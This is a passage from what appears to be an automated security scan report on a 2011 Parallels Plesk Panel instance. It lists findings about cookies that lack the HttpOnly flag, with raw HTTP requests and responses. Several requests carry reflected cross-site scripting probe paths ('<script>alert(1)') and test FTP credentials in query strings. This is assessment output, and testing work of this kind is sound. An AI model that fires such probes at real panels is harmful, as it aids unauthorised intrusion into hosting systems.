Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:26:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=3167c639ce1b08f48e3049df3f758ec8; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:26:34 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 May 2011 01:42:27 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=d2f17440e69c73361dcc188944327624; path=/
X-Powered-By: ASP.NET
Date: Tue, 24 May 2011 01:42:27 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:36:58 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=08ef70ae21325bdf1d3e7d74b0164348; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:36:57 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

5.7. http://vulnerable.plesk.control.panel.20110407.20:8880/get_password.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /get_password.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /get_password.php HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; no_frames=deleted; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:29 GMT
Connection: close
Content-Length: 5298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>

<link href="/skins/default/css/common/base.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->

<script type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script type="text/javascript" src="/javascript/jsw.js?plesk_version=psa-10.2.0-20110407.20"></script>

</head>

<body>

<div id="login-page">
<div id="wrapper">
<div id="top">
<div id="header-wrapper">
<div id="header">

<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif" alt="Parallels Plesk Panel" title="Parallels Plesk Panel" />
</h1>



</div>
</div>
</div>
<div id="content-wrapper">
<div id="content">
<div id="content-body" class="clearfix">
<div id="main">
<form id="form-changepassword-getlink" enctype="application/x-www-form-urlencoded" action="" method="post">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
<input type="hidden" name="cmd" value="get_password" />

<div id='getLinkSection' class='form-box' >
<div id='getLinkSection-content-area'>



<div class="login-info">
<h3>Retrieve password</h3>
<b>Attention!!!</b><br>
Sending password by e-mail is insecure!<br>
Enter your username and e-mail registered in the system for password delivery.
</div>
<div id='getLinkSection-username-form-row' class='form-row'>
<div class='field-name'><label for='getLinkSection-username'>Username&nbsp;</label></div>
<div class='field-value'>
<input type="text" name="login_name" id="getLinkSection-username" value="" class="input-text" />
</div>
</div>

<div id='getLinkSection-email-form-row' class='form-row' >
<div class='field-name'><label for='getLinkSection-email'>E-mail address&nbsp;</label></div>
<div class='field-value'>
<input type="text" name="email" id="getLinkSection-email" value="" class="input-text" />
</div>
</div>
</div>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
</div>
<div class="field-value">


<span id='btn-send' class='btn'>
<button type="submit" value="" name="send">Send</button>
</span>
<span id='btn-cancel' class='btn'>
<button id="getLinkSection-cancel-button" type="button" value="" name="cancel">Cancel</button>
</span>

<script type='text/javascript'>
Jsw.onReady(function() {
$('getLinkSection-cancel-button').observe('click', function () { Jsw.redirect("/login_up.php3"); } );
$('getLinkSection-username').focus();
});
</script>

<!-- ability to submit form via Enter -->
<input type="image" src="/smb/images/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>

</div>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="footer-wrapper" class="login-footer">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; 1999-2011, Parallels. All rights reserved.</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.8. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/backup/local-repository/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/backup/local-repository/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/account/show/id/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:17:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:17:55 GMT
Connection: close
Content-Length: 19117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController' + '&activeModule=' + 'account' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"active","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Backup Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.backup.local-repository/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=account.index/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/backup/local-repository/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
   <legend>Tools</legend>
   <table width="100%" cellspacing="0" cellpadding="0" border="0">
   <tr><td>
       <div class="screenButtons">
           <DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up your account configuration and your domains.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/create/&#039;); return false;" style=""><BUTTON name="bname_backup-now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/create/&#039;); return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV>
           <DIV class="commonButton" id="bid-backup-schedule" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for scheduled backup.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/schedule/&#039;); return false;" style=""><BUTTON name="bname_backup-schedule" id="buttonid-backup-schedule" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/schedule/&#039;); return false;">Scheduled Backup Settings</BUTTON><SPAN id="spanid-backup-schedule">Scheduled Backup Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-upload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Upload a backup file from your local computer to the server backup repository.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/upload/&#039;); return false;" style=""><BUTTON name="bname_upload" id="buttonid-upload" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/upload/&#039;); return false;">Upload Files to Server Repository</BUTTON><SPAN id="spanid-upload">Upload Files to Server Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-ftp-settings" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for your personal remote FTP repository where backup files should be stored.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/ftp-repository/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-settings" id="buttonid-ftp-settings" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/ftp-repository/properties/&#039;); return false;">Personal FTP Repository Settings</BUTTON><SPAN id="spanid-ftp-settings">Personal FTP Repository Settings</SPAN></DIV>
           
           <DIV class="commonButton" id="bid-refresh" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Refresh data on the screen.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/&#039;); return false;" style=""><BUTTON name="bname_refresh" id="buttonid-refresh" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/&#039;); return false;">Refresh</BUTTON><SPAN id="spanid-refresh">Refresh</SPAN></DIV>
       </div>
   </td></tr>
   </table>
   </fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Backups</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0">
       <tr><td>
           <div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/backup/local-repository/" onClick=";lon();"><span>Server Repository</span></a></li><li><A href="/plesk/client@2/backup/ftp-repository/" onClick=";lon();"><span>Personal FTP Repository</span></a></li><li class="last"><A href="/plesk/client@2/backup/task@/" onClick=";lon();"><span>Current Backup Tasks</span></a></li></ul></div></div>
       </td></tr>
       <tr><td>
           <div id="list">
               <script>
           function a(event) {tooltip.set(event, [{"type":"string","string":"This is a valid backup. Data can be restored from this backup."}]);}
           function b(event) {tooltip.set(event, [{"type":"string","string":"This is not a valid backup. Data cannot be restored from this file."}]);}
       </script><div class="paging pagingTop noList">No backups</div><div class="paging pagingBottom noList"></div><script>SetCookie("backuplocalrepositorylist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function BackupLocalRepositoryListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function BackupLocalRepositoryListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function BackupLocalRepositoryListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.BackupLocalRepositoryListSelectAll.checked;
                           BackupLocalRepositoryListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function BackupLocalRepositoryListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function BackupLocalRepositoryListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   BackupLocalRepositoryListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSearchShow()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function BackupLocalRepositoryListSearchHide()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function BackupLocalRepositoryListRemove(f)
           {
               if (0 == BackupLocalRepositoryListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/backup/local-repository/";
               lsubmit(f);
               return false;
           }
       </script>
           </div>
       </td></tr>        
       </table>
   </fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.9. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/account/show/id/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
